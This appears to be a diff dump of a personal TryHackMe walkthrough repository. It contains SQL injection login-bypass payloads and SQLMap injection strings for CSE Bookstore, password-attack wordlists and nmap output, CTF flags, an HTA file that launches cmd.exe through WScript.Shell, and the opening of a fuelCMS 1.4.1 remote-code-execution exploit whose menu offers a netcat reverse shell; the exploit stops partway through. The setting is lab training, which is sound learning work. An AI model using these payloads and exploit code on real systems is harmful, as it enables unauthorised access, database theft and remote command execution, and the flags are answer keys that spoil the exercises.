CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel.
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.
Payload:
Name: admin
Pass: %' or '1'='1
Sample BurpSuite intercept:
POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1
name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query

110
Walkthroughs/OWASP2021/vuln-and-outdated/49314 Normal file
View File

@@ -0,0 +1,110 @@
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date : 2020-12-21
# Author : Musyoka Ian
# Version : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform : PHP
# Tested on : Debian
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
Below is results returned by SQLMap
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
POC 1
REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
POC 2
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
REQUEST
=======
POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
POC 3.
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1

7231
Walkthroughs/ProtocolsAndServers/book.txt Normal file
View File

File diff suppressed because it is too large Load Diff

2
Walkthroughs/ProtocolsAndServers/ftp_flag.thm Normal file
View File

@@ -0,0 +1,2 @@
THM{364db6ad0e3ddfe7bf0b1870fb06fbdf}

6
Walkthroughs/RENmux/flag.txt Normal file
View File

@@ -0,0 +1,6 @@
This is the default text document for INetSim HTTP server fake mode.
This file is plain text.
You found it! The flag is = Tryhackme{remnux_edition}

10
Walkthroughs/RENmux/second_payload.ps1 Normal file
View File

@@ -0,0 +1,10 @@
<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>

10
Walkthroughs/RENmux/second_payload.zip Normal file
View File

@@ -0,0 +1,10 @@
<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>

105
Walkthroughs/RedTeaming/Password_Attacks/clinic.lst Normal file
View File

@@ -0,0 +1,105 @@
protected
Research
Oxytocin
Cortisol
Paracetamol
Cardiology
appointment
February
treatment
hospital
commonly
providing
Pregnancy
Saturday
Copyright
Laboratory
Departments
Insurance
Template
tooplate
surgeons
Balanced
referred
response
APPOINTMENT
Department
Additional
location
affiliated
Lifestyle
professionals
establishing
maintaining
qualified
physicians
committed
tailored
specific
requirements
customised
Exercise
healthier
official
Medicalmedical
researchers
specialists
together
medicine
pressing
findings
medicines
treatments
President
Weronika
multidisciplinary
Phillips
alleviate
nutrition
reliever
Benefits
clinical
innovative
situations
stressful
connections
reaction
released
technology
experience
vestibulum
porttitor
imperdiet
placerat
vehicula
Technology
Vestibulum
vulputate
Consultant
venenatis
eleifend
Phasellus
molestie
Facebook
maecenas
Suspendisse
dignissim
voluptate
Introducing
Categories
pharetra
Curabitur
consequat
ultricies
pulvinar
facilisis
lobortis
Maecenas
tincidunt
volutpat
fringilla
pellentesque
condimentum
interdum
Professional
thmredteam

366
Walkthroughs/RedTeaming/Password_Attacks/emails.lst Normal file
View File

@@ -0,0 +1,366 @@
and@clinic.thmredteam.com
Medical@clinic.thmredteam.com
Elite@clinic.thmredteam.com
protected@clinic.thmredteam.com
email@clinic.thmredteam.com
the@clinic.thmredteam.com
Health@clinic.thmredteam.com
NEWS@clinic.thmredteam.com
Research@clinic.thmredteam.com
your@clinic.thmredteam.com
News@clinic.thmredteam.com
THUMB@clinic.thmredteam.com
Our@clinic.thmredteam.com
Doctors@clinic.thmredteam.com
Welcome@clinic.thmredteam.com
Paracetamol@clinic.thmredteam.com
that@clinic.thmredteam.com
Oxytocin@clinic.thmredteam.com
Cortisol@clinic.thmredteam.com
Jason@clinic.thmredteam.com
Carlson@clinic.thmredteam.com
Head@clinic.thmredteam.com
About@clinic.thmredteam.com
MENU@clinic.thmredteam.com
Contact@clinic.thmredteam.com
Cardiology@clinic.thmredteam.com
appointment@clinic.thmredteam.com
Make@clinic.thmredteam.com
February@clinic.thmredteam.com
HERE@clinic.thmredteam.com
March@clinic.thmredteam.com
Latest@clinic.thmredteam.com
for@clinic.thmredteam.com
hospital@clinic.thmredteam.com
clinic@clinic.thmredteam.com
you@clinic.thmredteam.com
doctors@clinic.thmredteam.com
commonly@clinic.thmredteam.com
patient@clinic.thmredteam.com
January@clinic.thmredteam.com
treatment@clinic.thmredteam.com
Your@clinic.thmredteam.com
stress@clinic.thmredteam.com
providing@clinic.thmredteam.com
life@clinic.thmredteam.com
SECTION@clinic.thmredteam.com
Select@clinic.thmredteam.com
map@clinic.thmredteam.com
point@clinic.thmredteam.com
both@clinic.thmredteam.com
Click@clinic.thmredteam.com
TITLE@clinic.thmredteam.com
com@clinic.thmredteam.com
Center@clinic.thmredteam.com
Dental@clinic.thmredteam.com
http@clinic.thmredteam.com
Share@clinic.thmredteam.com
Pregnancy@clinic.thmredteam.com
Staff@clinic.thmredteam.com
Google@clinic.thmredteam.com
FOOTER@clinic.thmredteam.com
Info@clinic.thmredteam.com
Template@clinic.thmredteam.com
Tests@clinic.thmredteam.com
Departments@clinic.thmredteam.com
Insurance@clinic.thmredteam.com
tooplate@clinic.thmredteam.com
Policy@clinic.thmredteam.com
Careers@clinic.thmredteam.com
SCRIPTS@clinic.thmredteam.com
view@clinic.thmredteam.com
health@clinic.thmredteam.com
Home@clinic.thmredteam.com
LINKS@clinic.thmredteam.com
TEXT@clinic.thmredteam.com
lOGO@clinic.thmredteam.com
MAIN@clinic.thmredteam.com
CSS@clinic.thmredteam.com
Fri@clinic.thmredteam.com
Mon@clinic.thmredteam.com
Care@clinic.thmredteam.com
HEADER@clinic.thmredteam.com
LOADER@clinic.thmredteam.com
PRE@clinic.thmredteam.com
Opening@clinic.thmredteam.com
Hours@clinic.thmredteam.com
Monday@clinic.thmredteam.com
Friday@clinic.thmredteam.com
Saturday@clinic.thmredteam.com
www@clinic.thmredteam.com
Sunday@clinic.thmredteam.com
New@clinic.thmredteam.com
Laboratory@clinic.thmredteam.com
Copyright@clinic.thmredteam.com
Closed@clinic.thmredteam.com
change@clinic.thmredteam.com
General@clinic.thmredteam.com
Phone@clinic.thmredteam.com
How@clinic.thmredteam.com
Number@clinic.thmredteam.com
MAP@clinic.thmredteam.com
own@clinic.thmredteam.com
Additional@clinic.thmredteam.com
Name@clinic.thmredteam.com
Department@clinic.thmredteam.com
Date@clinic.thmredteam.com
GOOGLE@clinic.thmredteam.com
Maps@clinic.thmredteam.com
Button@clinic.thmredteam.com
Message@clinic.thmredteam.com
Submit@clinic.thmredteam.com
Email@clinic.thmredteam.com
location@clinic.thmredteam.com
can@clinic.thmredteam.com
assist@clinic.thmredteam.com
establishing@clinic.thmredteam.com
maintaining@clinic.thmredteam.com
network@clinic.thmredteam.com
highly@clinic.thmredteam.com
qualified@clinic.thmredteam.com
physicians@clinic.thmredteam.com
are@clinic.thmredteam.com
committed@clinic.thmredteam.com
high@clinic.thmredteam.com
quality@clinic.thmredteam.com
tailored@clinic.thmredteam.com
specific@clinic.thmredteam.com
requirements@clinic.thmredteam.com
The@clinic.thmredteam.com
official@clinic.thmredteam.com
website@clinic.thmredteam.com
Medicalmedical@clinic.thmredteam.com
surgery@clinic.thmredteam.com
choose@clinic.thmredteam.com
Embed@clinic.thmredteam.com
tab@clinic.thmredteam.com
Copy@clinic.thmredteam.com
only@clinic.thmredteam.com
URL@clinic.thmredteam.com
paste@clinic.thmredteam.com
within@clinic.thmredteam.com
src@clinic.thmredteam.com
field@clinic.thmredteam.com
below@clinic.thmredteam.com
THM@clinic.thmredteam.com
Red@clinic.thmredteam.com
Team@clinic.thmredteam.com
affiliated@clinic.thmredteam.com
company@clinic.thmredteam.com
employs@clinic.thmredteam.com
based@clinic.thmredteam.com
medical@clinic.thmredteam.com
professionals@clinic.thmredteam.com
has@clinic.thmredteam.com
been@clinic.thmredteam.com
best@clinic.thmredteam.com
safest@clinic.thmredteam.com
clinical@clinic.thmredteam.com
innovative@clinic.thmredteam.com
technology@clinic.thmredteam.com
experience@clinic.thmredteam.com
over@clinic.thmredteam.com
century@clinic.thmredteam.com
multidisciplinary@clinic.thmredteam.com
teams@clinic.thmredteam.com
surgeons@clinic.thmredteam.com
researchers@clinic.thmredteam.com
other@clinic.thmredteam.com
specialists@clinic.thmredteam.com
work@clinic.thmredteam.com
together@clinic.thmredteam.com
address@clinic.thmredteam.com
medicine@clinic.thmredteam.com
most@clinic.thmredteam.com
Website@clinic.thmredteam.com
HOME@clinic.thmredteam.com
Let@clinic.thmredteam.com
make@clinic.thmredteam.com
healthier@clinic.thmredteam.com
Healthy@clinic.thmredteam.com
Living@clinic.thmredteam.com
Meet@clinic.thmredteam.com
Exercise@clinic.thmredteam.com
regime@clinic.thmredteam.com
customised@clinic.thmredteam.com
Lifestyle@clinic.thmredteam.com
More@clinic.thmredteam.com
Balanced@clinic.thmredteam.com
with@clinic.thmredteam.com
right@clinic.thmredteam.com
nutrition@clinic.thmredteam.com
Benefits@clinic.thmredteam.com
Read@clinic.thmredteam.com
Stories@clinic.thmredteam.com
ABOUT@clinic.thmredteam.com
good@clinic.thmredteam.com
social@clinic.thmredteam.com
connections@clinic.thmredteam.com
stressful@clinic.thmredteam.com
situations@clinic.thmredteam.com
pain@clinic.thmredteam.com
reliever@clinic.thmredteam.com
used@clinic.thmredteam.com
alleviate@clinic.thmredteam.com
aches@clinic.thmredteam.com
pains@clinic.thmredteam.com
referred@clinic.thmredteam.com
hormone@clinic.thmredteam.com
because@clinic.thmredteam.com
its@clinic.thmredteam.com
link@clinic.thmredteam.com
response@clinic.thmredteam.com
MAKE@clinic.thmredteam.com
APPOINTMENT@clinic.thmredteam.com
CONTACT@clinic.thmredteam.com
FORM@clinic.thmredteam.com
pressing@clinic.thmredteam.com
issues@clinic.thmredteam.com
convert@clinic.thmredteam.com
findings@clinic.thmredteam.com
into@clinic.thmredteam.com
novel@clinic.thmredteam.com
medicines@clinic.thmredteam.com
treatments@clinic.thmredteam.com
Tanisha@clinic.thmredteam.com
Hughes@clinic.thmredteam.com
reaction@clinic.thmredteam.com
released@clinic.thmredteam.com
Phillips@clinic.thmredteam.com
Dario@clinic.thmredteam.com
Burgess@clinic.thmredteam.com
Weronika@clinic.thmredteam.com
Chief@clinic.thmredteam.com
Pittman@clinic.thmredteam.com
Pierre@clinic.thmredteam.com
TEAM@clinic.thmredteam.com
President@clinic.thmredteam.com
nisi@clinic.thmredteam.com
iaculis@clinic.thmredteam.com
libero@clinic.thmredteam.com
justo@clinic.thmredteam.com
vitae@clinic.thmredteam.com
gravida@clinic.thmredteam.com
commodo@clinic.thmredteam.com
imperdiet@clinic.thmredteam.com
purus@clinic.thmredteam.com
vestibulum@clinic.thmredteam.com
neque@clinic.thmredteam.com
eget@clinic.thmredteam.com
porta@clinic.thmredteam.com
enim@clinic.thmredteam.com
porttitor@clinic.thmredteam.com
sed@clinic.thmredteam.com
lorem@clinic.thmredteam.com
quis@clinic.thmredteam.com
posuere@clinic.thmredteam.com
quam@clinic.thmredteam.com
rutrum@clinic.thmredteam.com
molestie@clinic.thmredteam.com
placerat@clinic.thmredteam.com
sodales@clinic.thmredteam.com
vulputate@clinic.thmredteam.com
Vestibulum@clinic.thmredteam.com
est@clinic.thmredteam.com
dolor@clinic.thmredteam.com
risus@clinic.thmredteam.com
augue@clinic.thmredteam.com
eleifend@clinic.thmredteam.com
ipsum@clinic.thmredteam.com
diam@clinic.thmredteam.com
vehicula@clinic.thmredteam.com
Amazing@clinic.thmredteam.com
Technology@clinic.thmredteam.com
lectus@clinic.thmredteam.com
erat@clinic.thmredteam.com
Fusce@clinic.thmredteam.com
Phasellus@clinic.thmredteam.com
Consultant@clinic.thmredteam.com
euismod@clinic.thmredteam.com
venenatis@clinic.thmredteam.com
semper@clinic.thmredteam.com
Nunc@clinic.thmredteam.com
this@clinic.thmredteam.com
article@clinic.thmredteam.com
pulvinar@clinic.thmredteam.com
nisl@clinic.thmredteam.com
auctor@clinic.thmredteam.com
laoreet@clinic.thmredteam.com
metus@clinic.thmredteam.com
Suspendisse@clinic.thmredteam.com
dignissim@clinic.thmredteam.com
nec@clinic.thmredteam.com
lacinia@clinic.thmredteam.com
rhoncus@clinic.thmredteam.com
Process@clinic.thmredteam.com
Healing@clinic.thmredteam.com
ultricies@clinic.thmredteam.com
consequat@clinic.thmredteam.com
elit@clinic.thmredteam.com
Curabitur@clinic.thmredteam.com
pharetra@clinic.thmredteam.com
Social@clinic.thmredteam.com
Tags@clinic.thmredteam.com
Banner@clinic.thmredteam.com
Sidebar@clinic.thmredteam.com
Categories@clinic.thmredteam.com
process@clinic.thmredteam.com
healing@clinic.thmredteam.com
new@clinic.thmredteam.com
Introducing@clinic.thmredteam.com
Posts@clinic.thmredteam.com
Recent@clinic.thmredteam.com
voluptate@clinic.thmredteam.com
wisi@clinic.thmredteam.com
maecenas@clinic.thmredteam.com
amet@clinic.thmredteam.com
sit@clinic.thmredteam.com
Lorem@clinic.thmredteam.com
author@clinic.thmredteam.com
Twitter@clinic.thmredteam.com
Facebook@clinic.thmredteam.com
vel@clinic.thmredteam.com
volutpat@clinic.thmredteam.com
non@clinic.thmredteam.com
felis@clinic.thmredteam.com
maximus@clinic.thmredteam.com
congue@clinic.thmredteam.com
fringilla@clinic.thmredteam.com
pellentesque@clinic.thmredteam.com
Sed@clinic.thmredteam.com
condimentum@clinic.thmredteam.com
interdum@clinic.thmredteam.com
egestas@clinic.thmredteam.com
finibus@clinic.thmredteam.com
Aliquam@clinic.thmredteam.com
Aenean@clinic.thmredteam.com
Annual@clinic.thmredteam.com
Review@clinic.thmredteam.com
DETAIL@clinic.thmredteam.com
ealth@clinic.thmredteam.com
Professional@clinic.thmredteam.com
thmredteam@clinic.thmredteam.com
Clinic@clinic.thmredteam.com
Topic@clinic.thmredteam.com
sapien@clinic.thmredteam.com
Nulla@clinic.thmredteam.com
Cras@clinic.thmredteam.com
facilisis@clinic.thmredteam.com
luctus@clinic.thmredteam.com
turpis@clinic.thmredteam.com
ornare@clinic.thmredteam.com
Nullam@clinic.thmredteam.com
lobortis@clinic.thmredteam.com
tortor@clinic.thmredteam.com
ligula@clinic.thmredteam.com
Vivamus@clinic.thmredteam.com
tellus@clinic.thmredteam.com
Etiam@clinic.thmredteam.com
aliquam@clinic.thmredteam.com
Maecenas@clinic.thmredteam.com
nibh@clinic.thmredteam.com
tincidunt@clinic.thmredteam.com
Mauris@clinic.thmredteam.com
tempor@clinic.thmredteam.com
odio@clinic.thmredteam.com
Morbi@clinic.thmredteam.com

1
Walkthroughs/RedTeaming/Password_Attacks/ftp_flag.txt Normal file
View File

@@ -0,0 +1 @@
THM{d0abe799f25738ad739c20301aed357b}

66
Walkthroughs/RedTeaming/Password_Attacks/nmap.output Normal file
View File

@@ -0,0 +1,66 @@
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 19:08 CEST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 83.84% done; ETC: 19:08 (0:00:04 remaining)
Nmap scan report for passwordattack.thm (10.10.21.161)
Host is up (0.044s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 111 116 4096 Oct 12 2021 files
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:03:54:aa:5c:b4:df:a2:78:59:e4:c2:f1:ea:1b:ae (RSA)
| 256 17:b1:65:8e:0a:75:6d:4b:c4:65:1f:b5:4d:95:21:ac (ECDSA)
|_ 256 0f:c7:6e:6b:09:54:65:48:52:08:ec:1c:93:33:b4:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost
| Not valid before: 2021-10-07T08:49:39
|_Not valid after: 2031-10-05T08:49:39
|_smtp-commands: mail.thm.labs, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
465/tcp open ssl/smtp Postfix smtpd
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost
| Not valid before: 2021-10-07T08:49:39
|_Not valid after: 2031-10-05T08:49:39
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.thm.labs, PIPELINING, SIZE 10240000, ETRN, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
587/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.thm.labs, PIPELINING, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost
| Not valid before: 2021-10-07T08:49:39
|_Not valid after: 2031-10-05T08:49:39
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: Host: mail.thm.labs; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 46.25 ms 10.14.0.1
2 46.97 ms passwordattack.thm (10.10.21.161)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.60 seconds

21000
Walkthroughs/RedTeaming/Password_Attacks/password.lst Normal file
View File

File diff suppressed because it is too large Load Diff

537014
Walkthroughs/RedTeaming/Password_Attacks/password1.lst Normal file
View File

File diff suppressed because it is too large Load Diff

66
Walkthroughs/RedTeaming/Password_Attacks/password2.lst Normal file
View File

@@ -0,0 +1,66 @@
Fall2020!
Fall2020@
Fall2020#
Fall2020$
Fall2020%
Fall2020^
Fall2020&
Fall2020*
Fall2020(
Fall2020)
Fall2020-
Fall2020_
Fall2020+
Fall2020=
Fall2020~
Fall2020`
Fall2020[
Fall2020]
Fall2020{
Fall2020}
Fall2020|
Fall2020\
Fall2020:
Fall2020;
Fall2020"
Fall2020'
Fall2020<
Fall2020>
Fall2020,
Fall2020.
Fall2020?
Fall2020/
Fall2020
Fall2021!
Fall2021@
Fall2021#
Fall2021$
Fall2021%
Fall2021^
Fall2021&
Fall2021*
Fall2021(
Fall2021)
Fall2021-
Fall2021_
Fall2021+
Fall2021=
Fall2021~
Fall2021`
Fall2021[
Fall2021]
Fall2021{
Fall2021}
Fall2021|
Fall2021\
Fall2021:
Fall2021;
Fall2021"
Fall2021'
Fall2021<
Fall2021>
Fall2021,
Fall2021.
Fall2021?
Fall2021/
Fall2021

366
Walkthroughs/RedTeaming/Password_Attacks/username.lst Normal file
View File

@@ -0,0 +1,366 @@
and
Medical
Elite
protected
email
the
Health
NEWS
Research
your
News
THUMB
Our
Doctors
Welcome
Paracetamol
that
Oxytocin
Cortisol
Jason
Carlson
Head
About
MENU
Contact
Cardiology
appointment
Make
February
HERE
March
Latest
for
hospital
clinic
you
doctors
commonly
patient
January
treatment
Your
stress
providing
life
SECTION
Select
map
point
both
Click
TITLE
com
Center
Dental
http
Share
Pregnancy
Staff
Google
FOOTER
Info
Template
Tests
Departments
Insurance
tooplate
Policy
Careers
SCRIPTS
view
health
Home
LINKS
TEXT
lOGO
MAIN
CSS
Fri
Mon
Care
HEADER
LOADER
PRE
Opening
Hours
Monday
Friday
Saturday
www
Sunday
New
Laboratory
Copyright
Closed
change
General
Phone
How
Number
MAP
own
Additional
Name
Department
Date
GOOGLE
Maps
Button
Message
Submit
Email
location
can
assist
establishing
maintaining
network
highly
qualified
physicians
are
committed
high
quality
tailored
specific
requirements
The
official
website
Medicalmedical
surgery
choose
Embed
tab
Copy
only
URL
paste
within
src
field
below
THM
Red
Team
affiliated
company
employs
based
medical
professionals
has
been
best
safest
clinical
innovative
technology
experience
over
century
multidisciplinary
teams
surgeons
researchers
other
specialists
work
together
address
medicine
most
Website
HOME
Let
make
healthier
Healthy
Living
Meet
Exercise
regime
customised
Lifestyle
More
Balanced
with
right
nutrition
Benefits
Read
Stories
ABOUT
good
social
connections
stressful
situations
pain
reliever
used
alleviate
aches
pains
referred
hormone
because
its
link
response
MAKE
APPOINTMENT
CONTACT
FORM
pressing
issues
convert
findings
into
novel
medicines
treatments
Tanisha
Hughes
reaction
released
Phillips
Dario
Burgess
Weronika
Chief
Pittman
Pierre
TEAM
President
nisi
iaculis
libero
justo
vitae
gravida
commodo
imperdiet
purus
vestibulum
neque
eget
porta
enim
porttitor
sed
lorem
quis
posuere
quam
rutrum
molestie
placerat
sodales
vulputate
Vestibulum
est
dolor
risus
augue
eleifend
ipsum
diam
vehicula
Amazing
Technology
lectus
erat
Fusce
Phasellus
Consultant
euismod
venenatis
semper
Nunc
this
article
pulvinar
nisl
auctor
laoreet
metus
Suspendisse
dignissim
nec
lacinia
rhoncus
Process
Healing
ultricies
consequat
elit
Curabitur
pharetra
Social
Tags
Banner
Sidebar
Categories
process
healing
new
Introducing
Posts
Recent
voluptate
wisi
maecenas
amet
sit
Lorem
author
Twitter
Facebook
vel
volutpat
non
felis
maximus
congue
fringilla
pellentesque
Sed
condimentum
interdum
egestas
finibus
Aliquam
Aenean
Annual
Review
DETAIL
ealth
Professional
thmredteam
Clinic
Topic
sapien
Nulla
Cras
facilisis
luctus
turpis
ornare
Nullam
lobortis
tortor
ligula
Vivamus
tellus
Etiam
aliquam
Maecenas
nibh
tincidunt
Mauris
tempor
odio
Morbi

5
Walkthroughs/RedTeaming/Password_Attacks/usernames-list.txt Normal file
View File

@@ -0,0 +1,5 @@
admin
phillips
burgess
pittman
guess

8
Walkthroughs/RedTeaming/Weaponization/payload.hta Normal file
View File

@@ -0,0 +1,8 @@
<html>
<body>
<script>
var c= "cmd.exe"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

12
Walkthroughs/RedTeaming/Weaponization/thm.hta Normal file
View File

File diff suppressed because one or more lines are too long

69264
Walkthroughs/VulnerabilityCapstone/argparse Normal file
View File

File diff suppressed because it is too large Load Diff

129
Walkthroughs/VulnerabilityCapstone/exploit.py Executable file
View File

@@ -0,0 +1,129 @@
#!/usr/bin/python3
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#
# Poc Created by Ac1d (assassin)
import requests
import sys
import urllib
from requests.sessions import extract_cookies_to_jar
class col:
HEADER = '\033[95m'
BLUE = '\033[94m'
CYAN = '\033[96m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
def banner():
banner = r"""
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
"""
banner += "Created by Ac1d"
return col.LIGHT_BLUE + banner + col.RESET
def help():
banner = col.LIGHT_WHITE + "\n\tMenu\n"
banner += col.LIGHT_GREEN
banner += "\nexit -\tExit app"
banner += "\nshell_me -\tGet a reverse shell (netcat) "
banner += "\nhelp -\tShow this help\n"+ col.RESET
return banner
print(banner())
print(help())
#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
if len(sys.argv) != 2:
print("\nUsage: python3 exploit.py Vulnerable IPADDRESS")
sys.exit(0)
IP=sys.argv[1]
def parsePage(page):
try:
page = page.split("<h4>A PHP Error was encountered</h4>")[0]
page = page.split("<div")[0]
page = page[6:]
return page
except:
return False
try:
while True:
